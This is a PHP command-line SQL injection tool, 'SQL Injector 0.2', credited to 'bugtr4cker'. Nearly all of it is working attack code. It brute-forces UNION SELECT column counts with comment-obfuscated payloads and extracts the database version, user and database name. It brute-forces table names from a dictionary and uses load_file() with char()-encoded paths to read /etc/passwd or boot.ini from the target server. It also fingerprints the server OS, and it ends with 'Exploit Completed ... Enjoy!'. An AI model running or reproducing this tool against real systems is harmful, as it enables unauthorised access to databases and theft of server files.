<?php

#highlight_file(__FILE__);  exit();

print_r("
========================================================================
=                      SQL Injector - Version 0.2                      =
=                         Coded by bugtr4cker                          =
========================================================================
");

if(!isset($argv[1])){
         
print_r("= Usage : php $argv[0] URL                                   
= Exemple : php $argv[0] http://localhost/path/file.php?id=           
========================================================================
");

exit();
}

$url = $argv[1];

$url = preg_match("#^http:\/\/$#",$url) ? "http://".$url : $url ;

echo "\n\n [+] URL : $url\n";

$maxchamps = 100;

$nbrchamps = 1;

$plus = '';

while($nbrchamps <= $maxchamps){

$virgule = $plus != '' ? ',' : '';

$plus = $plus != '' ? substr($plus,0,strlen($plus)) : $plus ;
$plus .= $virgule."concat(0x696E6A6563746564,".str_repeat($nbrchamps,3).")";

$union = "-1/**/UNION/**/SELECT+".$plus."/*" ;

$s = $nbrchamps > 1 ? 's' : '';

echo "\n [!] Trying $nbrchamps column".$s;

$rep = @file_get_contents($url.$union);

if(is_injected($rep)){
    
	echo "\n\n [+] Injected ! \n\n [+] Columns count : $nbrchamps\n\n";

	################### Constructing a Proof Of Concept URL ###################
	
	 $PoC_URL = $url."-1/**/UNION/**/SELECT/**/";
    
        for($i = 1;$i <= $nbrchamps;$i++){
            
            $virgule = $i == 1 ? '' : ',';
            
            $PoC_URL .= $virgule.$i;
			
			if($i == $nbrchamps) $PoC_URL .= '/*';
        }

	echo "\n [+] PoC URL : $PoC_URL\n";

	################### Injecting Server Information  ###################

	echo "\n [+] Injecting Server Information\n";
	
	$serverinfo = array(
		"Server Version : " => "version()",
		"Username       : " => "user()",
		"Database       : " => "database()",
		);
	
	foreach($serverinfo as $toinject => $cmdline){
	
	$SInfo_URL = $url."-1/**/UNION/**/SELECT/**/";
    
        for($i = 1;$i <= $nbrchamps;$i++){
            
            $virgule = $i == 1 ? '' : ',';
            
            $SInfo_URL .= $virgule."concat(0x696E6A6563746564,".$cmdline.",0x696E6A6563746564)";
			
        }	
		
		$srep = @file_get_contents($SInfo_URL);
				
		preg_match_all("#injected(.*?)injected#",$srep,$sinfo);
		
		$value = isset($sinfo[1][0]) ? $sinfo[1][0] : 'Uknown' ;
		
		if($cmdline == "user()") $user = $value ;
		//if($cmdline == "version()") $version = $value ;

		echo "\n\t [+] $toinject $value";

	}
	
	$OS = get_server_os();

	echo "\n\t [+] Runing on      :  $OS\n";
	
	################### Injecting Tables Name  ###################

	$PoC_URL = $url."-1/**/UNION/**/SELECT/**/";
    
        for($i = 1;$i <= $nbrchamps;$i++){
            
            $virgule = $i == 1 ? '' : ',';
            
            $PoC_URL .= $virgule."concat(0x696E6A6563746564,".str_repeat($i,3).")";
			
			if($i == $nbrchamps) $PoC_URL .= '/*';
        }	
	
	echo "\n\n [+] Brutforcing tables name\n";
	
	$tables = bf_tables($PoC_URL);
	
	if(count($tables) == 0){
	
		echo "\n\n [-] No table Found from the dictionary !";
		
		}
	else {
	
		echo "\n\n [+] ".count($tables)." Table(s) Found !: \n";

	}
	
	################### Testing Load_FILE  ###################
	
	echo "\n\n [+] Testing FILE Privilege for username '$user'\n\n";
	
	$file_to_read = $OS == "Win32" ? 'c:/boot.ini' : '/etc/passwd';
	
	echo " [-] Trying to read file '$file_to_read' ...";
	
	$encoded_file = noquotes($file_to_read);

	$Inj_URL = $url."-1/**/UNION/**/SELECT/**/";
    
        for($i = 1;$i <= $nbrchamps;$i++){
            
            $virgule = $i == 1 ? '' : ',';
            
            $Inj_URL .= $virgule."concat(0x5F5F46494C455F5F,load_file($encoded_file),0x5F5F454E445F46494C455F5F)";
			
			if($i == $nbrchamps) $PoC_URL .= '/*';
        }	
	
	$Inj_URL ;
	
	$Inj_Data = @file_get_contents($Inj_URL);
	
	//echo $Inj_Data;
	
	$tabfile = explode("__FILE__",$Inj_Data);
	$tab2file= explode("__END_FILE__",$tabfile[1]);
	
	$file_content = trim($tab2file[0]);
	
	if($file_content == ""){
		
		echo "\n\t [-] FILE Priviliege is not Allowed for $user ";
		
		}
		
	else {
	
		echo "\n [+] Success ! FILE Privilege is Allowed for $user ";
		echo "\n\n [!] Content of $file_to_read : \n\n";
		sleep(2);
		
		echo $file_content ;
	
	}
	
	################### Testing Load_FILE  ###################
	
    exit("\n\n [+] Exploit Completed\n\n\tEnjoy !\n\n");
	
    }

$nbrchamps++;

}

echo "\n [-] Exploit Failed\n";

function bf_tables($PoC_URL){

$found_tables = array();

$tables = file("tables_dico.txt"); // Thanks to JADI for the tables dictionary

	foreach($tables as $table){

	$table = trim($table);
	
	#echo "\t [+]Trying table name : $table\n";
	
	$InjURL = $PoC_URL."/**/FROM/**/".$table."/*";
	
	$response = @file_get_contents($InjURL);
	
	if(is_injected($response)){
	
		echo "\n\t [t] $table";

		$found_tables[] = $table ;
		
		}
	}
	
return $found_tables ;

}

function is_injected($response){
	
	return preg_match("#injected[0-9]{3}#",$response);

}

function noquotes($text){

$out = "char(";
  for($i=0;$i<strlen($text);$i++){
    $out .= ord($text[$i]);
    if($i!=strlen($text)-1) $out .= ',';
    else $out .= ")";
  }

return $out ;
  
}

function get_server_os(){

global $url ;

$purl = parse_url($url);

$host = $purl['host'];
$path = $purl['path'];
$query= $purl['query']."=1";

$query  = "HEAD ".$path.$query." HTTP/1.1\r\n";
$query .= "Host: $host\r\n";
$query .= "Connection: close\r\n\r\n";

$rep = '';

$fp = fsockopen($host, 80, $errno, $errstr, 30);

fwrite($fp, $query);

	while (!feof($fp)) {
		
		$rep .= fgets($fp, 128);
		
	}

if(preg_match("#Win32#i",$rep)){
	
	return "Win32";
	
	}
	
else return "Linux";

}

?>